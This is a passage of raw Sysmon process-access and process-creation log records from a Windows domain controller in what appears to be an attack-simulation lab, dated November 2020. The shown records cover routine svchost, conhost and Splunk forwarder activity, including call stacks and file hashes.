Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002259Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002258Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002257Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.197{D28789B6-7C7A-5FA1-6900-000000008801}4124C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe8.0.2Remote Performance monitor using WMIsplunk ApplicationSplunk Inc.splunk-wmi.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=5DA29397A44401083341D66B52CA8BC4,SHA256=F51A58BCBF3532B9EF1B6478839424C33EA0426BCD5C6B4B636AD25D5177379C,IMPHASH=FFEB0CD073A55A73D08AC443E4942F81{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002283Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C7B-5FA1-6A00-000000008801}4152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002282Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002281Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002280Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002279Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002278Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002277Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002276Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002275Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002274Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002273Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C7B-5FA1-6A00-000000008801}4152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002272Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.269{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C7B-5FA1-6A00-000000008801}4152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002271Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:23.087{D28789B6-7C7B-5FA1-6A00-000000008801}4152C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002297Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.269{D28789B6-7C7B-5FA1-6B00-000000008801}41884192C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002296Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C7B-5FA1-6B00-000000008801}4188C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002295Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002294Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002293Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002292Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002291Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002290Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002289Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002288Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:24.128{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002287Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 